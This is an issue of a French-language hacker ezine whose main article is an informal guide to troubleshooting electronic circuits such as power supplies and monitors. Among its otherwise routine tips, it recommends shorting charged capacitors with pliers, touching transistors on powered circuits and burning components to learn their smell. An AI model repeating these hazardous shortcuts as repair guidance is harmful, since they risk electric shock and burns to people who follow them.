| _ | |
| / \ | | C'est le premier article de hack au monde qui
|| | | / fini mal :] Y reste que vous en connaisez vous
(.) (.)| / des ezines qui ont le culot de vous faire ca,
|| | | <__ a vous , cher clients :)
|| | | | |
|| | | | |
|____/|| | |
|\___/ | | |
|| | | | |
|| | | | |
|| | | | |
|| | |
| \___/ |
| |
\______/
Greeting
Merci a tout ceux qui on volontairement ou involontairement participer a
l'edition de cette articles (human-howto and flavoured device).
G463, Nitrogen, Utopiste, __2, endrix, Blink 182 (le groupe), Burger King,
Videotron (dans le sens de ca ou un autre, tant que c pas chere, aka 0$)
Winamp/mpg123
-------------------------twighlight zone----------------------------------
le ministere de la defence a le regret de vous anoncez que vos fils sont
mort parce qu'il etais con.
goose.top gun
--------------------------------------------------------------------------
Shitlist
Merci a tout ceux grace a qui, sans eux on vivrais un bonheur parfait et
totalement emmerdant.
Gregory, point com, #linuxqc, Mcdonnald, Jean Chretien, Les chips nature,
la rootbeer, l'impot a 45%, l'essence a 75c le litre, les users qui se
trompe 3x de mots de passe, les tiquets de 400$, mon muffler, ma porte
droite, ma transmission,
Et surtout n'oublier pas qu'il ne sert a rien d'exploser
Wyzeman.le.barbu.de.notre-dame.com
-[ Qwzykx is now a official non-original expression lifeform ]-- -- -
.------------------------------------------ ------------ ---- -- -- --
; Les filles sont intelligentes [08]
'------------------------------------------ ------------ ---- -- -- --
Simple toolz for a good start in the understending process of
electronic debugging.
D'abord il faut savoir se situer au centre de toute cette
technologie qui nous entour. Regarder votre ordinateur,
votre voiture, votre callorifaire vos montres digitals a huit
cadrants synchroniser a l'heure de Rome ou encore le GPS que
vous retrouver chez Latulipe a 150$. Tout ces systemes
fonctionnent a l'aide ce que l'hummanite s'accorde à appler
l'électricité. Mais comemt reussir à comprendre ou encore a
debugger ces petits circuits sur les quelles vous ne connaissez
rien? Tout d'abbord je n'apporterai pas de solutions miracles
dans cette article, car dans ce dommaine c'est avec l'expérience
qu'on est aptes à bien cerner de différents principes.
Donc ce mois-ci je ne ferer qu'une introduction à la mentaliter ou
plutot à l'objectiviter qu'il vous faudra avoir avant de vous
proclamer leet electro power tweaker.
Bien sur il est très utile de connaitre les rudiments des pieces
electroniques qui composent un circuits. Certains sont reconnus
plus que d'autres pour etre une cause de problemes constants.
Les pieces les plus simples sont souvent peu defectueuse
(Resistances, bobines, condensateur en céramique).
Les condensateurs électrolytiques ont tendances à etre plus à risques
ce ceux de la catégotie précédante.
D'autre par, les pieces qui subissent des températures élever sont
souvent, tres souvent une belle cause de problemes. En fait il
devrait etre isolés et à vérifier en premier. On reconnais ces
pieces par les HeatSink qui leurs sont souvent attahcer. On retrouve
surtout dans cette catégorie les transistors de puissances, les
résistance de 1/2 Watt.
Les circuits intégrées sont sensibles aux haut voltage, des haut
voltage pouvant provenir d'une décharge statique par exemple.
Mais lors de leurs implentation dans un circuit, ces puces sont
rarement une source de probleme, ou si elle le sont, on le sais assez
facilement. En fait les circuits de nos jours sont souvent controler
par de tel chips, si elle sont defectueuses, c'est le circuits au
complet qui sera instables et non une section spécifiques... mais
encore la il faut etre prudent, on ne sais jamais!
Avant tout il serait intressant de savoir a quel sorte de systeme
vous avez a faire avant d'émuler de la connaissance. En somme vous
devriez savoir que dans le cas d'un moniteur on s`attend a trouver
des circuits qui controleront les couleurs, les frequences de
balayage and etc... Dans un ordinateur vous devriez vous attendre a
trouver un power supply, une carte mere ainsi que ces ports de I/O.
Et dans votre voiture vous retrouverz tout logiquement une puce de
traitement central qui sera relier a une sections qui aura pour but
d'amplifier le voltage afin de faire declancher différents systèmes.
En somme, une étude logique serait un prérequis essentiel à l'annalyse
d'un circuit, et ce meme sii vous n'avrez aucuns plants.. après tout,
faut pas avoir 150 de QI pour savoir qui a un moteur dans votre
schécheuse... surtout si elle est munie d'une prise de courrant!
Bien souvent les problemes que vous rencontrere dans vos differants
appareils technologique est un probleme mecanique, on parle ici d'une
gear de pèté, une strape qui est slack ou qui est tellement sec
qu'elle glisse. Mais pour d'autres systemes qui ne sont pas composer
de ces petites parties mobles, il existe d'autres facon de trouver un
probleme.
Encore faut t'il savoir isoler le plus possible le probleme avant de
le regler. Par exemple, si votre PC ne veux plus démarer, la premiere
chose a regarder c'est de s'assurer de son allimentation, ces peut
etre con mais sacher ce les plus gros problemes sont souvent issues
de petites nieseries.
Donc si apres cette verification rien de fonctionne, la seconde etape
serait de verifier si votre power supply est en bonne etat, pour se
faire il vous faudra un outils de prédilection du technicien en
electronique :Le multimètre. Essyer simplement de voir si vous
obtenner un voltage sur les connecteur de celui-ci. Si vous
n'obtenner rien, une lumiere devrais automatiquement s'ouvrir et
illuminer vos pensées. Pour etre sur que le problème réside dans ce
power supply, remplacer le si possible afin de verifier vos
intérogations. Si rien de marche apres cette dure épreuve, il vous
faudera surement plus de patience car le probleme sera surement du
cote de la bother board. (ou d'un des periferique, si tel est le
cas, brancher les un apres l'autres pour encore une fois isoler le
probleme.) Si dans un autre cas, le probleme semble devenir du
power supply, vous n'aurez d'autes choix que d'ouvrir celui-ci
afind de pouvoir trippoter en profondeur les organnes malades ce
celui-ci. Tache délicate certaine fois, dans des circuits
d'allimentations d'ont sont composer la plus part des appreils,
circuits qui transforme le 120v en 12v,5v, on a souvent recours a
des transformateur ainsi que des circuits de rectifications dans le
but de transformer le 120v alternatif en un "beau" signal du genre
30v continue.
Le procèder ne s'effectue seulement lorsque le circuit est
allimenter, mais meme le 120 n'est aucunement relier au circuits que
vous annalyser, il n'en demeure pas moins que certaines composantes
comme les condensateur ont comme proprieter de conserver l'énergie
qu'ils ont enmagasiner. Mais ces condensateur sont plutot facile
à déceler car ils ont une magnifique forme phalique qui est beaucoups
plus grande que leurs homologues. En somme, ils sont plus gros et
situer pres du transformateur. Donc avant de commencer votre
opération a coeur ouvert, aller donc souper ou, avec votre multimètre,
vérifier le voltage aux bornes du condensateur. Si vous obtener une
reponse qui est du genre 0v, tout va bien, passer à l'étape suivante,
sinon, deux coix s'offre à vous: Prendre une résiatance d'environ
10kOhms de 1/2 Watt et reunir les deux poles du condensateur avec ses
deux autres pates de résistance (affin de décharger l'énergie atravers
la résistance soyez encore une fois prudent, ne toucher pas aux metal
qui relie ces deux bornes, car le but est de justement éviter de
pognier le courrant! Une autre méthode plus expéditive existe pour
ceux qui n'aiment pas se trscasser la tete, le classique short, en
somme vous prener une paire de pince en métal, (avec le manche isoler)
et puis vous réunisser les deux bornes du condensateur. Un bon SPARK
devrais se produire, dequoi vous laisser le coeur en palpitation pour
un bon moment, depluis cette méthode a souvent comme effet secondaire
de faire fondre le métal de vos pinces au point de contact. Mais vous
serez assurer plus que jamais que ces copndensateurs seront décharger.
Une fois ce rituel accomplie, passons à l'étape suivante. Sacher
repérer les Hots Sport, et par cette affirmation je vous convie a
rechercher les points de faiblesses que j'ai mentionner plus hauts,
soit les endroits ou les enginner on poser des Heat Sink. Souvent vous
trouverez a ces endroits des transistors de puissances, et évidament
il vous faudra les vérifier. Avant d'aller plus loin, je tiens a vous
inciter a faire preuve de logique, si vous voyez un condensateur
ouvert ou une résistance toute noir, sacher que vous devriez commener
par ces endroits en premier. Dans le cas contraire, il vous faudra
d'abord désouder ce transistor et le vérifier hors du cricuit. Porter
attention au type de composente, sur chaques pieces moindrement
complexe, vous trouverez un numéro de série, ce numéro est catloger
dans un livre applerm ECG quie vous pourrez trouvez chez un détaillant
de pièces électroniques pour moins de 6-7$ et croyez moi, si vous
jouer souvent dans ce type de circuits, ca vaut la peine. Vous serez
capable avec ce numéro de série de voir la nature même de la
composente (sa fonction ainsi que son branchement) Une fois ceci
trouver, vous pourrez vous affèrer a tester la dite composante.
Et comme ces bons vieux trappeur des bois, manipuler cette pièce,
gibier de la technologie, regarder la, senrter la attentivement et
tenter de découvrir si elle de serait pas abimer ou elle ne sentirait
pas ce doux perfum d'électronique burned.. (un conseil ici, c`est
toujours profitable de faire bruler des chips,résistance,condensateur
ou transistors, car avec le temps on reconnais en chacunes de ces
composentes une signiatures aromatiser unique. Si cette aventure
n'est pas concluante, vous n'aiurez que le choix d'annalyzer cette
pièce, pour ce faire , votre multimetre en main, en mode Test de
Continuitée, vous devrez vérifier si la composente est Shorter ou
elle est aucontraire completement ouverte. Malheureusement pour vous,
cette article de précise pas comment vérifier les diverssent
composentes, mais si le désirs de certains se manifaissent j'en
parlerer surement dans le prochain Zine. Apres cette vérification, si
la pièce est bonne, remetter la en place et passer à la suiivante.
Sinon, vous venez simplement de trouver votre problème. La plus part
des circuits sont diviser en des différents blocs ces blocs sont de
véritables aide débuggage, en somme simplement par le shémas de
routage (les chemins sous la carte) on peut voir que les chemins qui
sont plus gros servent a l'allimentation, les autres sont souvent
dédier pour les données ou le controle (mais pas dans le cas d'un
power supply évidament!) Un des points de test important, est la
sortie du transformateur. Cette emplacement permet tout d'abord de
vérifier si ce dernier est fonctionelle (si il transforme le
courrant)
et en second lieux il sert de départ pour votre circuit. Suivre une
trace sur un circuit imprimer est un travail complexe et nécécite
souvent l'usage du test de continuitée de votre multimètre. Avec
cette connaissance du chemin emprunter par l'allimentation de votre
power supply, vous pouverz vérifier directement les pièces qui sont
relier au dit chemin. Encore une fois on tente d'isoler le problème.
Cette technique est aussi tres utiles dans le cas d'un moniteur video
(un putin d'ecran) si vous avez un probleme avec votre teinte de
rouge, commencer d'abbord par ouvrir votre boitier d`ecran, vous
trouver des potentiometres, ces petites résistances variables servent
a justement ajuster vos couleur, votre focus and etc... Pour modifier
la valeur de ces potentiometre utiliser un tournevis en plastique,
afin d'eviter un short (je par le par experience) Si vos couleurs
sont encore tout croche, vous devriez annalyser la situation. Un
probleme de trensistor se resume souvent a un des evènements suivants:
Marche, marche pas. Tandisque qu'un condensateur à la particuliaritée
de ce charger rapidement selons un model expodentiel et de ce
décharger selont le meme model. En somme si voyus voyer un degrader
de couleur qui part du rouge foncer vers la gauche et qui tent vers le
rouge pale vers la droite, et que le tout est concentrer uniquement
vers la gauche, une lumiere devrais encore s'allumer dans vorte esprit
(Forme expodentiel, condensateur!) Comme vous ne disposer pas
d'osscioscope, tout comme moi, vous devrez desouder tout les
condensateur sur le chemin du ROUGE (si c'est celui qui fuck) Vérifier
donc vos condensateur et leurs valeurs. Si parcontre aucun ROUGE ne
parait, opter plutot pour la these du trensistor. Aussi facilement
fiable comme technique c'est de vérifier en touchant aux transistors
les quelles sont actifs, en gros si pour vos trois couleurs vous avez
trois transistors, et que seulement deux d'entres eux sont chauds,
celui qui est froid n'est peut etre pas fonctionelle, et aucontraire
si il chauffe beaucoup plus il y a peut etre un probleme. Avec un
ECG vous pouvez aussi vériifier les signials de I/O de la puce qui
controle vos couleurs, le multimetre est encore une fois
indispensable. Mais je vous en conjure immédiatement, commencer par
le plus simple, c'est à dire de jouer avec votre fils d'écran de
facon a voir si le mauvait contact n'est pas directemetn la ou encore
sur votre carde video (a noter que les trois suppositions énumérer me
sont arriver... je parle encore une fois par expérience.)
D'autre part, si sur une applicatrion ou un module a une seule
fonction qui ne marche pas, verifier d'abord la fuse et snsuite
aller y par le plus probable soir le Relay (si il y en a un) ou
encore la continuitée du lien.
Si vous avez une carte qui commence a déconner apres une temps X
d'utilisation, vous pouvez en déduire qu'il sagit surement d'un
porbleme de surchauffage. Afin de réduire le champs de recherche du
probleme, une technique simple consisite a prendre du Freezer
(genre de bombonne d'aire froid) et de vaporiser votre circuit avec.
Ainsi vous pourrez isoler le probleme. Ou encore si votre carte marche
en mode Alternatif, ce qui laisse souvent place aux problemes de
soudures froides, allumer vorte circuit et avec le manche d'un
tournevis peser sur votre circuit quand il est en marche, le manche
etant isoler (je l'espère) le fait de faire "travailler" la carte
mecaniquement vous permetra peut etre encore une fois de trouver dans
quel section du circuit se situe la soudure froide.
En terminnant, il est inutile de garocher votre fer a souder partout
si vos cossins marchent pas comme vous le voulez, surtout si
celui-ci est encore chaud (et je parle encore par expérience.)
Trouver un probleme est un travail parfois long et pénible mais
toujours instructif!
En conclusion, souvent en électronique comme en programmation, on
cherche toujours des gros problèmes de la mort quand finalement
ces seulement un fils qui esrt mal pluguer. Cette article aura
probablement une suite futur, avec plus de contenu extra fabulatoire..
mais encore dans le respect de votre intelligence.
- qwzykx
-[ Loue-tout loue tout! ]------------------------------- ---- --- -- - -
---- La fin
Et oui deja la fin, ce magazine etait petit mais instructif, jespere :)
Vous avez aimer le produit? Dites-nous le! Ca jamais tuer personne
d'accepter vos opinions, si ils sont negatifs vous pouvez nous les
envoyez a.. ah non envoyez-nous les pas finalement :) Have phun and
wait the next issue :)